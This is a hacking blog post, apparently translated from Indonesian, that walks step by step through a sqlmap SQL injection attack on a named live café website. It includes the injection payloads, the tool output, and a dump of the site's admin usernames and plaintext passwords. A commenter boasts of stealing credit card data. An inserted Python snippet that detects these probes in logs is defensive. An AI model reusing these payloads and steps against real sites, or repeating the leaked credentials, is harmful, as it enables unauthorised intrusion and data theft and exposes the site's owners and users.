First, prepare the stuff:
2. sqlmap ( http://sourceforge.net/projects/sqlmap/files/sqlmap/0.9/sqlmap-0.9.zip/download?use_mirror=nchc )
3. coffee + cigarettes
Let's head straight to the target.
*************************************************************************/
1. We start by analysing the website using the (-u) option.
The result will be:
[*] starting at 12:49:03
[12:49:03] [INFO] testing connection to the target url
[12:49:08] [INFO] testing if the url is stable, wait a few seconds
[12:49:13] [INFO] url is stable
[12:49:13] [INFO] testing if GET parameter 'id' is dynamic
[12:49:17] [INFO] confirming that GET parameter 'id' is dynamic
[12:49:21] [INFO] GET parameter 'id' is dynamic
[12:49:22] [INFO] heuristics detected web page charset 'ascii'
[12:49:22] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[12:49:22] [INFO] testing for SQL injection on GET parameter 'id'
[12:49:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:49:23] [WARNING] reflective value(s) found and filtering out
[12:49:36] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[12:49:36] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[12:49:37] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[12:49:37] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[12:49:38] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[12:50:39] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[12:50:39] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[12:50:39] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[12:50:46] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:50:55] [INFO] target url appears to have 4 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[12:51:18] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. --dbms=mysql)
[12:51:18] [INFO] testing 'Generic UNION query (71) - 1 to 20 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 39 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3 AND 5377=5377

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=3 AND (SELECT 1217 FROM(SELECT COUNT(*),CONCAT(0x3a686c683a,(SELECT (CASE WHEN (1217=1217) THEN 1 ELSE 0 END)),0x3a6e65633a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=3 AND SLEEP(5)
---
[12:51:33] [INFO] the back-end DBMS is MySQL
web application technology: PHP 4.4.9, Apache
back-end DBMS: MySQL 5.0
[12:51:33] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\ou
[*] shutting down at 12:51:33
*************************************************************************/
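As an added defender-side example (not part of the original post), the following Python scans web server access log lines for the three probe classes sqlmap reported above against the `id` parameter (boolean-based, error-based, time-based) and shows that a strict integer check on `id` would have rejected every one of them. The sample log lines, their dates and IPs, the regexes and the `inspect`/`scan` names are all constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Regexes for the three payload classes sqlmap reported against 'id' in the run
# above. Hypothetical patterns written for this example, not sqlmap's own.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "time-based blind": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
}
# Combined log format: "METHOD target proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(r'"(?P<method>\w+) (?P<target>\S+) [^"]*" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')
# Constructed sample lines (date, IP and sizes invented; the error-based
# payload is abbreviated from the one shown above).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2000:12:49:03 +0000] "GET /artists_profile.php?id=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/Jan/2000:12:49:36 +0000] "GET /artists_profile.php?id=3%20AND%205377%3D5377 HTTP/1.1" 200 5120 "-" "sqlmap/0.9"',
    '203.0.113.5 - - [01/Jan/2000:12:49:37 +0000] "GET /artists_profile.php?id=3%20AND%20%28SELECT%201217%20FROM%28SELECT%20COUNT%28%2A%29%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 HTTP/1.1" 500 312 "-" "sqlmap/0.9"',
    '203.0.113.5 - - [01/Jan/2000:12:50:39 +0000] "GET /artists_profile.php?id=3%20AND%20SLEEP%285%29 HTTP/1.1" 200 5120 "-" "sqlmap/0.9"',
]

def inspect(line, param="id"):
    """Decode one access-log line and classify the given query parameter.
    Returns None when the line is not in combined log format."""
    m = LOG_RE.search(line)
    if m is None:
        return None
    query = urlsplit(m.group("target")).query
    value = parse_qs(query, keep_blank_values=True).get(param, [""])[0]
    return {
        "value": value,
        "techniques": [name for name, rx in SIGNATURES.items() if rx.search(value)],
        "sqlmap_ua": "sqlmap" in m.group("ua").lower(),
        # Whitelist check: a plain-integer id rejects every probe (the validation the target lacked).
        "rejected_by_int_check": not value.isdigit(),
    }

def scan(lines, param="id"):
    """Return (line_no, techniques, sqlmap_ua) for each line that looks like a probe."""
    hits = []
    for n, line in enumerate(lines, 1):
        r = inspect(line, param)
        if r and (r["techniques"] or r["sqlmap_ua"]):
            hits.append((n, r["techniques"], r["sqlmap_ua"]))
    return hits

if __name__ == "__main__":
    for n, techniques, ua in scan(SAMPLE_LOG):
        print(f"line {n}: techniques={techniques} sqlmap_user_agent={ua}")
```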
2. To find all the databases: here we look for every database on the target server.
[*] starting at 12:57:16
[12:57:16] [INFO] resuming back-end DBMS 'mysql'
[12:57:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3 AND 5377=5377

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=3 AND (SELECT 1217 FROM(SELECT COUNT(*),CONCAT(0x3a686c683a,(SELECT (CASE WHEN (1217=1217) THEN 1 ELSE 0 END)),0x3a6e65633a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=3 AND SLEEP(5)
---
[12:57:21] [INFO] the back-end DBMS is MySQL
web application technology: PHP 4.4.9, Apache
back-end DBMS: MySQL 5.0
[12:57:21] [INFO] fetching database names
[12:57:22] [INFO] heuristics detected web page charset 'ascii'
[12:57:22] [INFO] the SQL query used returns 2 entries
[12:57:23] [INFO] retrieved: information_schema
[12:57:24] [INFO] retrieved: db197631714
available databases [2]:
[*] db197631714
[*] information_schema
[12:57:24] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\output\www.zenithcafe.co.uk'
[*] shutting down at 12:57:24
*************************************************************************/
BINGO, WE GOT THE DATABASES:
available databases [2]:
[*] db197631714
[*] information_schema
*************************************************************************/
3. Once we've got the database, we just look for its tables and columns :D
ists_profile.php?id=3 -v 0
[*] starting at 13:04:47
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3 AND 5377=5377

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=3 AND (SELECT 1217 FROM(SELECT COUNT(*),CONCAT(0x3a686c683a,(SELECT (CASE WHEN (1217=1217) THEN 1 ELSE 0 END)),0x3a6e65633a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=3 AND SLEEP(5)
---
web application technology: PHP 4.4.9, Apache
back-end DBMS: MySQL 5.0
[13:04:55] [INFO] retrieved: admin_permissions
[13:04:57] [INFO] retrieved: admin_users
[13:04:58] [INFO] retrieved: artist_samples
[13:04:59] [INFO] retrieved: artists
[13:05:00] [INFO] retrieved: events
[13:05:02] [INFO] retrieved: newsletters
[13:05:03] [INFO] retrieved: recipe
[13:05:04] [INFO] retrieved: releases
Database: db197631714
[8 tables]
+-------------------+
| admin_permissions |
| admin_users       |
| artist_samples    |
| artists           |
| events            |
| newsletters       |
| recipe            |
| releases          |
+-------------------+
[*] shutting down at 13:05:05
*************************************************************************/
BINGO, we got the tables :D
*************************************************************************/
4. Once we've got that, we just look for the target's columns :D
c:\Python27>sqlmap\sqlmap.py --columns -T admin_users -D db197631714 -u www.zenithcafe.co.uk/artists_profile.php?id=3 -v 0
*************************************************************************/
[*] starting at 13:13:58
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3 AND 5377=5377

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=3 AND (SELECT 1217 FROM(SELECT COUNT(*),CONCAT(0x3a686c683a,(SELECT (CASE WHEN (1217=1217) THEN 1 ELSE 0 END)),0x3a6e65633a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=3 AND SLEEP(5)
---
web application technology: PHP 4.4.9, Apache
back-end DBMS: MySQL 5.0
[13:14:37] [INFO] retrieved: username
[13:14:42] [INFO] retrieved: text
[13:14:47] [INFO] retrieved: email
[13:14:52] [INFO] retrieved: text
[13:14:57] [INFO] retrieved: clientname
[13:15:01] [INFO] retrieved: text
[13:15:04] [INFO] retrieved: expires
[13:15:05] [INFO] retrieved: int(11)
[13:15:09] [INFO] retrieved: password
[13:15:10] [INFO] retrieved: text
[13:15:12] [INFO] retrieved: admin
[13:15:13] [INFO] retrieved: tinyint(4)
Database: db197631714
Table: admin_users
[6 columns]
+------------+------------+
| Column     | Type       |
+------------+------------+
| admin      | tinyint(4) |
| clientname | text       |
| email      | text       |
| expires    | int(11)    |
| password   | text       |
| username   | text       |
+------------+------------+
[*] shutting down at 13:15:13
*************************************************************************/
BINGO AGAIN :D we got the website's column data :D
hahaha
*************************************************************************/
5. Now we just dump the website's data so we get the information, hahaha :D
c:\Python27>sqlmap\sqlmap.py --dump -C username,password -T admin_users -D db197
*************************************************************************/
[*] starting at 13:25:51
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3 AND 5377=5377

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=3 AND (SELECT 1217 FROM(SELECT COUNT(*),CONCAT(0x3a686c683a,(SELECT (CASE WHEN (1217=1217) THEN 1 ELSE 0 END)),0x3a6e65633a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=3 AND SLEEP(5)
---
web application technology: PHP 4.4.9, Apache
back-end DBMS: MySQL 5.0
[13:25:59] [INFO] retrieved: airbiscuit
[13:26:00] [INFO] retrieved: airbiscuit
[13:26:01] [INFO] retrieved: clocks
[13:26:02] [INFO] retrieved: Drawing Clocks
[13:26:04] [INFO] retrieved: clocks
[13:26:05] [INFO] retrieved: Peter
[13:26:06] [INFO] retrieved: Curnow
[13:26:07] [INFO] retrieved: Ian
[13:26:09] [INFO] retrieved: gruv76
[13:26:10] [INFO] retrieved: zenith
[13:26:12] [INFO] retrieved: lovelovelove
[13:26:13] [INFO] retrieved: rogers
[13:26:14] [INFO] retrieved: not
[13:26:15] [INFO] retrieved: Tony Moore
[13:26:16] [INFO] retrieved: Parker
[13:26:17] [INFO] retrieved: Parker
[13:26:18] [INFO] retrieved: rogers
[13:26:19] [INFO] retrieved: Lee Rogers
[13:26:20] [INFO] retrieved: Rusty
[13:26:21] [INFO] retrieved: Rusty
[13:26:22] [INFO] retrieved: sainato
[13:26:22] [INFO] retrieved: Giangi
Database: db197631714
Table: admin_users
[11 entries]
+----------------+--------------+
| username       | password     |
+----------------+--------------+
| airbiscuit     | airbiscuit   |
| Drawing Clocks | clocks       |
| Peter          | clocks       |
| Ian            | Curnow       |
| zenith         | gruv76       |
| rogers         | lovelovelove |
| Tony Moore     | not          |
| Parker         | Parker       |
| Lee Rogers     | rogers       |
| Rusty          | Rusty        |
| Giangi         | sainato      |
+----------------+--------------+
[*] shutting down at 13:26:23
*************************************************************************/
BINGO, WE GOT THE USERNAMES & PASSWORDS :D
HAHAHA...
3 comments:
awesome, bro...
got a question, bro...
where does that id=3 come from, bro...??
Thx bro, 100% vuln .. I got CC, satisfied now.. :D
https://www.facebook.com/dandy.hacker087716282390